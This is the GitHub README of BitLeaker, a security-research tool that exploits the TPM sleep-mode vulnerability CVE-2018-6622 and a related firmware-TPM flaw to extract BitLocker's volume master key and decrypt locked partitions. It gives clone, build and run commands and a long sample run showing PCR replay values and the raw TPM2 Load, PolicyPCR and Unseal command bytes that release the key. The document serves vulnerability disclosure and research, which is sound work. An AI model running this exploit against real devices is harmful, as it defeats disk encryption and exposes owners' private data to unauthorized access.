kkamagui / bitleaker Goto Github PK

This tool can decrypt a BitLocker-locked partition with the TPM vulnerability

License: Other

Makefile 0.59% C 16.72% Python 75.68% Shell 7.01%

blackhat cve-2018-6622 tpm-20 blackhateurope-2019

bitleaker's Introduction

                                                     ,║▒▒▒▒▒▒@╖
                                                    ╥▒▒╝    ▒▒▒╢
                                                   ]▒▒╢      ]▒▒╢
                                                   ]▒▒▒      j▒▒╢
                               ,                 ,╖║▒▒▒         
                 ,╓╖,  ╓@╬@╥╥╬╣╢╢▓▓            ╖▒╖▒╙▒▒▒░░░▒░▒▒▒▒.
             ║╬@▓╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[           ╜╜╜╢╢▒▒░░░░░░▒@▓▓▄▒▒▒▒╖
             ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[           ░░░░░╙╢▓╣╬▓▓@@▓▓@░░æ▓▓▓[
             ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢..[           ░░░░░ ░▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒H
             ╢                    ╢`           ░░░░░░░▒▒▒▒▒▒▒▒▒▒╢▒▒╢╢╢[
             ..╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢            ░░░░░░░▒▒▒▒▒▒▒▒▒▒╢╢╢╢╢╢[
             ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[      ¿░░░,░░░░░░░▒▒▒▒▒▒▒▒▒▒╢╢╢╢╢╢[
             ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢░░░░░░░░░░░░╣▓▓@░░░▒▒▒▒▒▒▒▒▒▒╫╣╣╣▓▓[
               ╙╙   ╙╬ ╨╜╙╬╢╢╢╣╣╢╢╢░░░░░░░░░░░░░░░░╫▓@▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓[
                  ,,, ,░░░░░░░░░░╙╨░░░░░░░░░░░░░░░░░░▓▒▒▒▓▓▓▓▓▓▓▓▓▓▓▀"`
             ,,.░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░]▒░░░╙╢▒▓╣▓▒▒▒▒  ]
             ▐▓█████▄░░░░▒░░░░░░░░░░░░░░░░░░░░░░░░░░╟▒▒▒▒▒▒▒▒▒╣▓╢╢╢ ░░
             ▐▓▓██████████▄░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▓╢▒▒▒▒╢▓╢╢▒┌░░
             ▐▓▓█████████████████▄░░░▒▒░░▒▒▒▒▒▒▒╢╢╢╢╢╢Ñ▒▒▓╢▒▒▒▒▓╣╢╜▒░░
             ╜▓▓██▀████████████████▌║▒▒▒▒╢╢╢╢╣╢╢╢╣╣╣╣╣╣╣╝╣▒▒╢▓"    ▒░░
             ` "╙``╙╣▀█▀▀██████████▌╢╢╢╢╢╢╢╣╣╣╣╣╢Ñ╜╨Ñ╝`    ╙  ,,   ▒▒▒
                      "` "╨╢▀▀▓▓███▌╢╣╣╣╣╣╣╜╜╨╨╜      ▄, ░░   ,▌ ░░▒▒▒
              ░   e             ╙╣▓▌Ñ╜╙╙╜`            ▌▓ ░░░  ░░░░░▒▒▒
              ░░░░╧╤░░░    ,       ,         ▐░ ░░░░  ░░░░░░░░█▐░▒░▒▒▒
              ░░░░,░░░░░░  ▐,     j▌█    ░ ░░░░░░░░░░░▐░░▒░░░░░░░▒░▒▒▒
              ░░░░▌█░░░░░░░░░░░░ ░░░░░░░░░░░░╪░░░░░░░░░░░▒░░▒░▒▌▒▒▒▒▒▒`
             ▒▒▒▒░▒▒▒▒▒▒░░æ▄▒░▒▒░░æ▄▒▒▒▒▒▒▒▒▌▓▒▒▒▒▒▒▒æ▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒
             ]▒▒▒▒░▒▒▒▒▒▒▒▒╬▒▒▒▒▒▒▒╬▒▒▒▒▒▒▒▒▒▐▌▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░
             └ ▒░░▒▒▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒]▒░▒▒░▒░▒▒▒░▒▒▒░░░ ░░░; ░░
               ▒░░▒▒░▒║░▒▒▒▒▒▒░▒▒▒▒▒░▒]▒▒]░░▒▒░░ ░░▒░▒░▒░░  ░░ ⌡  ░
               ░ ░░▒░▒] ░░▒░▒░░▒▒░]░░▒;▒▒]░░░░ ░ ░░j░░░▒░   ░  !
                 ░▒L░░└   ░░  ░▒ ░ ░░▒!▒▒ ░ ░  ░ ░░└ ░ ▒
                  ▒L░       ░▒  ░ ░      ░ ░ ░ └ ░  

          BitLeaker v1.0 for decrypting BitLocker with One Vulnerability
                Project link: https://github.com/kkamagui/bitleaker

1. Notice

BitLeaker is a new tool for extracting the VMK and mounting a BitLocker-locked partition. BitLeaker uses the TPM vulnerability, CVE-2018-6622 for a discrete TPM and related vulnerability for a firmware TPM. They are related to the S3 sleeping state of Advanced Configuration and Power Interface (ACPI) and can reset the TPMs. If you want the detailed information about CVE-2018-6622 and a vulnerability checking tool, please read our USENIX paper, A Bad Dream: Subverting Trusted Platform Module While You Are Sleeping and Black Hat Asia presentation, Finally, I Can Sleep Tonight: Catching Sleep Mode Vulnerabilities of the TPM with Napper.

1.1. Presentation, Paper, and Demo

BitLeaker and related materials were introduced at security conferences below.

You can watch the demo video below.

1.2. Contributions

We always welcome your contributions. If you have any other ideas, feel free to contact us.

1.3. License

BitLeaker has GPL v2 license.

2. Introduce of BitLeaker

Trusted Platform Module (TPM) is a tamper-resistant security module. It has been widely deployed in commercial devices to protect secret data and ensure the trustworthiness of a system. There are two typical types of TPMs, hardware-based discrete TPM (dTPM) and firmware-based TPM (fTPM). Microsoft Windows has used both types of TPMs to protect the Volume Master Key (VMK) of their disk encryption software, BitLocker.

BitLocker's TPM feature has not been analyzed in detail. It has hidden behind the TPMs because the TPM protected the VMK of BitLocker with sealing and unsealing functions. Most security researchers concluded the VMK sealed by the TPM was safe. Recent works also showed the only way to extract the VMK from the TPM was physical access like probing the Low Pin Count (LPC) bus or TPM pins. However, we found a novel way that can subvert BitLocker with only the software.

We introduce a sleep mode vulnerability of the dTPM and fTPM that can subvert BitLocker. We also introduce a new tool, BitLeaker, that can extract the VMK from the TPMs and decrypt a BitLocker-locked partition without physical access. Last year, we already introduced a dTPM vulnerability, CVE-2018-6622. However, we found out that the same vulnerability was in the fTPM this year, especially Intel Platform Trust Technology (PTT). The sleep mode vulnerability can subvert not only the fTPM but also the dTPM with the S3 sleeping state of Advanced Configuration and Power Interface (ACPI), and it can forge Platform Configuration Registers (PCRs). PCRs are core parts of the sealing and unsealing functions to protect the VMK of BitLocker. By exploiting the vulnerability, we extracted the VMK from TPMs and decrypted a BitLocker-locked partition with our custom tool, BitLeaker.

3. How to Use the BitLeaker Tool

BitLeaker consists of a BitLeaker bootloader, BitLeaker kernel module, BitLeaker launcher, customized TPM2-TSS, and TPM2_tools. It is based on Ubuntu 18.04, and you can make a Live CD with Ubuntu and BitLeaker.

3.1 Install Ubuntu 18.04 with UEFI mode and Clone BitLeaker Source Code

=== Caution ===

If you don't use UEFI mode, BitLeaker will not work!

If you want to use the bitleaker.desktop app icon, Please set the user ID to bitleaker and copy bitleaker.desktop file to /usr/share/applications directory.

===============

BitLeaker is based on Ubuntu 18.04. Therefore, you download it from Official Ubuntu Website and install it to your target system with UEFI mode.

After that, you clone BitLeaker source code from the BitLeaker project site, https://www.github.com/kkamagui/bitleaker and build it with commands below.

# Clone Bitleaker source code from project site.
$> git clone https://github.com/kkamagui/bitleaker.git

# Build Bitleaker.
$> cd bitleaker
$> ./bootstrap

3.2 Run BitLeaker with a Terminal

After building the source code, you can run a BitLeaker tool with a terminal. Please type the command below in your terminal. BitLeaker front-end is made of Python script.

# Run BitLeaker
$> sudo ./bitleaker.py

# if you want to use the bitleaker app icon, please copy bitleaker.desktop to /usr/share/applications
$> sudo bitleaker.desktop /usr/share/applications

3.3. Test Example

The result below is an example of NUC8i7HVK model. The system has an old version of BIOS and a fTPM.

$> sudo ./bitleaker.py 
[sudo] password for bitleaker: 
                                                ,║▒▒▒▒▒▒@╖
                                               ╥▒▒╝    ▒▒▒╢
                                              ]▒▒╢      ]▒▒╢
                                              ]▒▒▒      j▒▒╢
                          ,                 ,╖║▒▒▒
            ,╓╖,  ╓@╬@╥╥╬╣╢╢▓▓            ╖▒╖▒╙▒▒▒░░░▒░▒▒▒▒.
        ║╬@▓╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[           ╜╜╜╢╢▒▒░░░░░░▒@▓▓▄▒▒▒▒╖
        ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[           ░░░░░╙╢▓╣╬▓▓@@▓▓@░░æ▓▓▓[
        ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢..[           ░░░░░ ░▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒H
        ╢                    ╢`           ░░░░░░░▒▒▒▒▒▒▒▒▒▒╢▒▒╢╢╢[
        ..╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢            ░░░░░░░▒▒▒▒▒▒▒▒▒▒╢╢╢╢╢╢[
        ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[      ¿░░░,░░░░░░░▒▒▒▒▒▒▒▒▒▒╢╢╢╢╢╢[
        ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢░░░░░░░░░░░░╣▓▓@░░░▒▒▒▒▒▒▒▒▒▒╫╣╣╣▓▓[
          ╙╙   ╙╬ ╨╜╙╬╢╢╢╣╣╢╢╢░░░░░░░░░░░░░░░░╫▓@▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓[
             ,,, ,░░░░░░░░░░╙╨░░░░░░░░░░░░░░░░░░▓▒▒▒▓▓▓▓▓▓▓▓▓▓▓▀"`
        ,,.░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░]▒░░░╙╢▒▓╣▓▒▒▒▒  ]
        ▐▓█████▄░░░░▒░░░░░░░░░░░░░░░░░░░░░░░░░░╟▒▒▒▒▒▒▒▒▒╣▓╢╢╢ ░░
        ▐▓▓██████████▄░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▓╢▒▒▒▒╢▓╢╢▒┌░░
        ▐▓▓█████████████████▄░░░▒▒░░▒▒▒▒▒▒▒╢╢╢╢╢╢Ñ▒▒▓╢▒▒▒▒▓╣╢╜▒░░
        ╜▓▓██▀████████████████▌║▒▒▒▒╢╢╢╢╣╢╢╢╣╣╣╣╣╣╣╝╣▒▒╢▓"    ▒░░
        ` "╙``╙╣▀█▀▀██████████▌╢╢╢╢╢╢╢╣╣╣╣╣╢Ñ╜╨Ñ╝`    ╙  ,,   ▒▒▒
                 "` "╨╢▀▀▓▓███▌╢╣╣╣╣╣╣╜╜╨╨╜      ▄, ░░   ,▌ ░░▒▒▒
         ░   e             ╙╣▓▌Ñ╜╙╙╜`            ▌▓ ░░░  ░░░░░▒▒▒
         ░░░░╧╤░░░    ,       ,         ▐░ ░░░░  ░░░░░░░░█▐░▒░▒▒▒
         ░░░░,░░░░░░  ▐,     j▌█    ░ ░░░░░░░░░░░▐░░▒░░░░░░░▒░▒▒▒
         ░░░░▌█░░░░░░░░░░░░ ░░░░░░░░░░░░╪░░░░░░░░░░░▒░░▒░▒▌▒▒▒▒▒▒`
        ▒▒▒▒░▒▒▒▒▒▒░░æ▄▒░▒▒░░æ▄▒▒▒▒▒▒▒▒▌▓▒▒▒▒▒▒▒æ▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒
        ]▒▒▒▒░▒▒▒▒▒▒▒▒╬▒▒▒▒▒▒▒╬▒▒▒▒▒▒▒▒▒▐▌▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░
        └ ▒░░▒▒▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒]▒░▒▒░▒░▒▒▒░▒▒▒░░░ ░░░; ░░
          ▒░░▒▒░▒║░▒▒▒▒▒▒░▒▒▒▒▒░▒]▒▒]░░▒▒░░ ░░▒░▒░▒░░  ░░ ⌡  ░
          ░ ░░▒░▒] ░░▒░▒░░▒▒░]░░▒;▒▒]░░░░ ░ ░░j░░░▒░   ░  !
            ░▒L░░└   ░░  ░▒ ░ ░░▒!▒▒ ░ ░  ░ ░░└ ░ ▒
             ▒L░       ░▒  ░ ░      ░ ░ ░ └ ░

    BitLeaker v1.0 for decrypting BitLocker with the TPM vulnerability
           Project link: https://github.com/kkamagui/bitleaker 

Search for BitLocker-locked partitions.
    [>>] BitLocker-locked partition is [/dev/nvme0n1p4]

Loading BitLeaker kernel module... Success
Entering sleep...
    [>>] Please press any key or power button to wake up...
Waking up...
    [>>] Please press any key to continue...

Preparing PCR data.
    [>>] Get PCR data from BitLeaker driver... Success

Cut and extract essential PCR data.
    [>>] Extract PCR numbers and SHA256 hashes... Success

Replay TPM data.
    [>>] Checking the resource manager process... Success

... omitted ...

    [>>] PCR 7 , SHA256 = ccfc4bb32888a345bc8aeadaba552b627d99348c767681ab3141f5b01e40a40e
PCR Num 7
ccfc4bb32888a345bc8aeadaba552b627d99348c767681ab3141f5b01e40a40e

Bank/Algorithm: TPM_ALG_SHA256(0x000b)
PCR_00: f4 7c a8 7c 43 ed b5 1f 72 f7 21 21 d1 4f 28 b2 db 37 a6 d4 d7 7a c1 f2 cc c1 4b 32 5f da 8b ac
PCR_01: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_02: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_03: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_04: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_05: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_06: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_07: e5 8a da 1b a7 5f 2e 47 22 b5 39 82 45 98 ad 5e 10 c5 5f 2e 4a ea b2 03 3f 3b 0a 8e e3 f3 ec a6
PCR_08: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_09: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_11: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_12: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_13: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_14: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_15: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_16: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_17: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_18: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_19: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_20: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_21: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_22: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_23: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    [>>] PCR 7 , SHA256 = 78684298cc54cf7550bd38d3c378eeee59d3ae027632cda6f507ac5ccd257b35
PCR Num 7
78684298cc54cf7550bd38d3c378eeee59d3ae027632cda6f507ac5ccd257b35

Bank/Algorithm: TPM_ALG_SHA256(0x000b)
PCR_00: f4 7c a8 7c 43 ed b5 1f 72 f7 21 21 d1 4f 28 b2 db 37 a6 d4 d7 7a c1 f2 cc c1 4b 32 5f da 8b ac
PCR_01: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_02: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_03: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_04: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_05: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_06: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_07: f1 fe 22 30 a9 50 85 ba f7 23 f5 36 d2 2a e8 af b8 23 ae 9c 35 5e f0 8f d8 5a 27 3c 4d 8b 17 f4
PCR_08: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_09: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_11: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_12: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_13: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_14: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_15: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_16: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_17: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_18: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_19: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_20: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_21: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_22: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_23: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

... omitted ...

    [>>] Last PCR 7, SHA256 = 30bf464ee37f1bc0c7b1a5bf25eced275347c3ab1492d5623ae9f7663be07dd5
PCR Num 7
30bf464ee37f1bc0c7b1a5bf25eced275347c3ab1492d5623ae9f7663be07dd5

Bank/Algorithm: TPM_ALG_SHA256(0x000b)
PCR_00: e3 af a3 d7 72 16 ce f7 ca f4 3b f6 ca 88 83 48 06 56 01 3f 4b 6b c3 7b 29 ca aa ed b2 a6 33 96
PCR_01: 51 4a e7 aa f6 82 3a 4c c1 1a c8 17 73 ac a4 19 4c ca dc 07 31 58 d1 1a 67 ef c8 f7 9d 75 a9 0f
PCR_02: 85 f6 3d 95 59 75 fb d1 ca 4e 93 4b 32 b9 3b f9 3f 4d 68 5f cb b4 3f e5 80 05 51 69 b7 57 fd 6e
PCR_03: 3d 45 8c fe 55 cc 03 ea 1f 44 3f 15 62 be ec 8d f5 1c 75 e1 4a 9f cf 9a 72 34 a1 3f 19 8e 79 69
PCR_04: 3d 45 8c fe 55 cc 03 ea 1f 44 3f 15 62 be ec 8d f5 1c 75 e1 4a 9f cf 9a 72 34 a1 3f 19 8e 79 69
PCR_05: c7 02 7a ef 3a 65 5b 76 5c ad c6 69 2f 9e 81 13 7b 41 76 c3 20 a7 4f c9 d6 30 b3 da cc b6 c5 5a
PCR_06: 3d 45 8c fe 55 cc 03 ea 1f 44 3f 15 62 be ec 8d f5 1c 75 e1 4a 9f cf 9a 72 34 a1 3f 19 8e 79 69
PCR_07: f6 dd c2 72 1f 58 23 76 90 ff 44 e6 0c 41 18 a9 f3 6d 88 dd ee 64 8c f2 f0 a9 77 74 4e a9 2d 6c
PCR_08: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_09: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_11: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_12: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_13: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_14: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_15: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_16: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_17: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_18: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_19: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_20: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_21: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_22: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_23: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Preparing TPM data.
    [>>] Get TPM-encoded blob from dislocker... Success
    [>>] Convert TPM-encoded blob to hex data... Success
    [>>] Create TPM2_Load data... Success
    [>>] Create TPM2_StartSession data... Success
    [>>] Create TPM2_PolicyAuthorize data... Success
    [>>] Create TPM2_PolicyPCR data... Success
    [>>] Create TPM2_Unseal data... Success

Execute TPM commands
    [>>] Execute TPM2_Load... Input file tpm2_load.bin
Initializing Local Device TCTI Interface
    [*] Input Size 247
00000000  80 02 00 00 00 f7 00 00  01 57 81 00 00 01 00 00  |.........W......|
00000010  00 09 40 00 00 09 00 00  00 00 00 00 8a 00 20 b7  |..@........... .|
00000020  3f 86 88 16 00 33 91 70  d2 63 d4 0e 94 58 ee a9  |?....3.p.c...X..|
00000030  ac f4 6c cd da 0d a2 e7  7c 0f 66 7d ac fe f6 00  |..l.....|.f}....|
00000040  10 ae fc 34 82 87 63 18  bf f6 6d 24 95 f2 0b 7f  |...4..c...m$....|
00000050  de 01 28 d4 2c a4 7b 4b  95 f2 51 a2 44 46 89 44  |..(.,.{K..Q.DF.D|
00000060  94 70 f7 f0 f5 9b d0 4c  01 40 71 21 fe 4b af 82  |.p.....L.@q!.K..|
00000070  8a cd aa 4c 2b 76 a4 46  17 db 49 2f d1 bb 9b 41  |...L+v.F..I/...A|
00000080  4f 83 89 01 24 f6 9e db  f8 0a d6 5d 45 63 41 e5  |O...$......]EcA.|
00000090  29 b4 0e 8e f0 44 a5 52  75 bf 12 c1 85 ad 79 31  |)....D.Ru.....y1|
000000a0  79 5e 60 61 cd 99 f9 00  4e 00 08 00 0b 00 00 04  |y^`a....N.......|
000000b0  12 00 20 6f b5 05 0c 0a  64 e6 ff 2e 0a f1 8e 9c  |.. o....d.......|
000000c0  d8 26 40 87 44 b0 f2 08  4a bc a9 c7 cd 7e 72 17  |.&@.D...J....~r.|
000000d0  de cc f0 00 10 00 20 54  4a d5 bc 0f ec ca db 9c  |...... TJ.......|
000000e0  b1 56 8e be 6f 9a 3b 25  2f d9 37 9f 3e b1 e1 98  |.V..o.;%/.7.>...|
000000f0  f7 48 cd 93 c2 82 51                              |.H....Q|

    [*] Output Size 59, Result: Success
00000000  80 02 00 00 00 3b 00 00  00 00 80 00 00 01 00 00  |.....;..........|
00000010  00 24 00 22 00 0b 70 63  1d 68 87 fb 16 55 bd 3e  |.$."..pc.h...U.>|
00000020  71 c6 7b 02 17 2c 2c 33  c7 00 fa 45 9c 1e 1c 7d  |q.{..,,3...E...}|
00000030  b2 91 fc b4 7f 86 00 00  01 00 00                 |...........|
    [>>] Success

    [>>] Execute TPM2_StartSession... Input file tpm2_startsession.bin
Initializing Local Device TCTI Interface
    [*] Input Size 59
00000000  80 01 00 00 00 3b 00 00  01 76 40 00 00 07 40 00  |.....;...v@...@.|
00000010  00 07 00 20 e3 4c e2 d5  48 7f 73 97 b2 8d b4 e7  |... .L..H.s.....|
00000020  93 de 4c 36 91 8a a5 1f  3b 48 0c 1f 7f 75 79 c5  |..L6....;H...uy.|
00000030  ee fa a9 83 00 00 01 00  10 00 0b                 |...........|

    [*] Output Size 48, Result: Success
00000000  80 01 00 00 00 30 00 00  00 00 03 00 00 00 00 20  |.....0......... |
00000010  20 cf 43 fd 28 52 c0 e9  91 2f d8 10 e5 f7 20 4d  | .C.(R.../.... M|
00000020  7e 0e dc ce 5c 97 97 71  06 7a af ee cc 45 b2 10  |~...\..q.z...E..|
    [>>] Success

    [>>] Execute TPM2_PolicyAuthorize... Input file tpm2_policyauthorize.bin
Initializing Local Device TCTI Interface
    [*] Input Size 14
00000000  80 01 00 00 00 0e 00 00  01 6b 03 00 00 00        |.........k....|

    [*] Output Size 10, Result: Success
00000000  80 01 00 00 00 0a 00 00  00 00                    |..........|
    [>>] Success

    [>>] Execute TPM2_PolicyAuthorize... Input file tpm2_policypcr.bin
Initializing Local Device TCTI Interface
    [*] Input Size 58
00000000  80 01 00 00 00 3a 00 00  01 7f 03 00 00 00 00 20  |.....:......... |
00000010  5f f5 9b 8f b8 7c 48 dc  43 68 60 eb a2 70 cc a2  |_....|H.Ch`..p..|
00000020  22 4e 7b b9 f0 83 ed fe  78 91 fa ed e2 b4 de 5a  |"N{.....x......Z|
00000030  00 00 00 01 00 0b 03 80  08 00                    |..........|

    [*] Output Size 10, Result: Success
00000000  80 01 00 00 00 0a 00 00  00 00                    |..........|
    [>>] Success

    [>>] Execute TPM2_Unseal... Input file tpm2_unseal.bin
Initializing Local Device TCTI Interface
    [*] Input Size 27
00000000  80 02 00 00 00 1b 00 00  01 5e 80 00 00 01 00 00  |.........^......|
00000010  00 09 03 00 00 00 00 00  00 00 00                 |...........|

    [*] Output Size 97, Result: Success
00000000  80 02 00 00 00 61 00 00  00 00 00 00 00 2e 00 2c  |.....a.........,|
00000010  2c 00 00 00 01 00 00 00  03 20 00 00 10 c7 ea 90  |,........ ......|
00000020  6d 6d a4 82 1f 96 cc 81  66 06 e9 12 fa 04 56 b3  |mm......f.....V.|
00000030  5a 5c 11 61 fc c5 aa 74  6a 23 f5 4b 00 20 34 5a  |Z\.a...tj#.K. 4Z|
